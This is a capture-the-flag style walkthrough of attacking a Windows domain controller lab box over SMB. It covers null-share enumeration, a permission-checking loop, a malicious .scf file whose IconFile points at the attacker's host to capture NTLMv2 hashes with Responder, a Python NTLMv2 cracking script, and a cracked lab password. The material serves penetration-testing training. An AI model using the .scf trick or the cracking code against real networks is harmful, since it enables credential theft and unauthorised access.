SMB

PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
|_smb-print-text: false
| smb2-time: 
|   date: 2022-08-11T15:35:38
|_  start_date: 2022-08-11T15:33:45
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

SMB NULL SHARES

	dr--r--r--                0 Mon Jul  2 15:16:54 2018	2018
	.\Department Shares\Users\*
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	.
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	..
	dr--r--r--                0 Mon Jul  2 15:18:43 2018	amanda
	dr--r--r--                0 Mon Jul  2 15:19:06 2018	amanda_adm
	dr--r--r--                0 Mon Jul  2 15:18:28 2018	bill
	dr--r--r--                0 Mon Jul  2 15:18:31 2018	bob
	dr--r--r--                0 Mon Jul  2 15:19:14 2018	chris
	dr--r--r--                0 Mon Jul  2 15:18:39 2018	henry
	dr--r--r--                0 Mon Jul  2 15:18:34 2018	joe
	dr--r--r--                0 Mon Jul  2 15:18:53 2018	jose
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	lkys37en
	dr--r--r--                0 Mon Jul  2 15:18:48 2018	morgan
	dr--r--r--                0 Mon Jul  2 15:19:20 2018	mrb3n
	dr--r--r--                0 Wed Sep 26 01:45:32 2018	Public

The null session gives us a list of domain users (one folder per user) who might be targets for roasting attacks.

Unfortunately Kerberos (port 88) isn't exposed to us, so AS-REP roasting isn't possible at this stage.

However, after mounting the share we could see the user folders and the permissions on each of them.

Using the following script (run from inside the mounted Users directory; -N makes smbcacls use a null session, and we only print the ACEs for Everyone):

tput civis
for directory in *; do
    echo -e "\n [*] Enumerating Permissions in the $directory:\n"
    echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" "Users/$directory" -N | grep "Everyone")"
done
tput cnorm

Output for the interesting folder, Public:

[*] Enumerating Permissions in the Public:

	ACL:Everyone:ALLOWED/OI|CI/FULL
	ACL:Everyone:ALLOWED/OI|CI|I/READ

Everyone has FULL control on the Public folder (the OI|CI flags mean the ACE is inherited by new files and subfolders), so we have write access there. That opens several routes to a shell or credentials: drop a file that makes a client authenticate to our host so we can capture NTLMv2 hashes, or plant a payload such as an .hta file.

After starting Responder and placing the following .scf file in Public, a user browsing the folder made Explorer fetch the "icon" over SMB from our host (10.10.14.7) and I was able to capture NTLMv2 hashes. The UNC path in IconFile does not need to exist; the authentication attempt is what matters.

[Shell]
Command=2
IconFile=\\10.10.14.7\home\kali\driver.scf
[Taskbar]
Command=ToggleDesktop

Cracking the captured NTLMv2 hash offline gave amanda's password: Ashare1972. With valid domain credentials we can start the enumeration over.
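To make the capture-and-crack step concrete, here is an added example (not part of the original write-up) that shows what Responder actually hands you and how the offline check works: the NT hash is MD4 of the UTF-16LE password, the NTLMv2 key is HMAC-MD5 of that over UPPER(user)+domain, and NTProofStr is HMAC-MD5 of the key over the server challenge plus the client blob. A candidate password is right when it reproduces the NTProofStr in the capture. Because the page does not include the captured hash, the sample line is constructed here by simulating the client side with a made-up server challenge and blob; the user/domain/password values come from the write-up, and the line layout is the hashcat -m 5600 format that Responder prints. MD4 is implemented inline because many OpenSSL 3 builds of hashlib only expose it through the legacy provider.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's MD4 is often unavailable on OpenSSL 3."""
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    order2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    order3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        a, b, c, d = state
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _rotl((a + g(b, c, d) + x[order2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rotl((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what the DC stores for the user."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(key, challenge || blob) with key = HMAC-MD5(NT hash, UPPER(user) || domain)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_capture(line: str):
    """Parse a Responder / hashcat -m 5600 line: user::domain:challenge:NTProofStr:blob."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line: str, wordlist):
    """Return the first candidate that reproduces the captured NTProofStr, else None."""
    user, domain, challenge, proof, blob = parse_capture(line)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, challenge, blob), proof):
            return candidate
    return None


def build_sample_capture(user: str, domain: str, password: str) -> str:
    """Constructed sample: simulate the client's NTLMv2 response for a fixed server
    challenge and blob and format it the way Responder prints it. The challenge,
    timestamp and client nonce are made up; they are not from the real target."""
    challenge = bytes.fromhex("1122334455667788")
    dom = domain.encode("utf-16le")
    blob = (
        bytes.fromhex("0101000000000000")        # response type 1, hi-type 1, reserved
        + bytes.fromhex("00d1b3c7a5b6d801")      # timestamp (FILETIME, constructed)
        + bytes.fromhex("0f0e0d0c0b0a0908")      # client challenge (constructed)
        + bytes(4)                               # reserved
        + struct.pack("<HH", 2, len(dom)) + dom  # AV pair 2: NetBIOS domain name
        + bytes(4)                               # AV_EOL
        + bytes(4)                               # trailing reserved
    )
    proof = ntlmv2_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    line = build_sample_capture("amanda", "HTB", "Ashare1972")
    print(line)
    print("cracked:", crack(line, ["Password1", "Summer2018", "Ashare1972"]))
```

In practice you feed the Responder line straight to hashcat with -m 5600; the point of the script is to show that an NTLMv2 capture is only a salted HMAC over the challenge, so any password in a wordlist is verifiable offline without touching the target again.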

smbmap -H 10.10.10.103 -u 'amanda' -p 'Ashare1972'       
[+] IP: 10.10.10.103:445	Name: HTB.LOCAL                                         
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	Department Shares                                 	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Operations                                        	NO ACCESS	
	SYSVOL                                            	READ ONLY	Logon server share 

Authenticated as amanda we get read access to CertEnroll, NETLOGON and SYSVOL, while Operations and the admin shares stay NO ACCESS. CertEnroll is the Active Directory Certificate Services share, so ADCS is running on this host and is worth looking at.

RPC

Domain users enumerated over RPC (rpcclient enumdomusers output), one per line:

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[amanda] rid:[0x450]
user:[mrlky] rid:[0x643]
user:[sizzler] rid:[0x644]
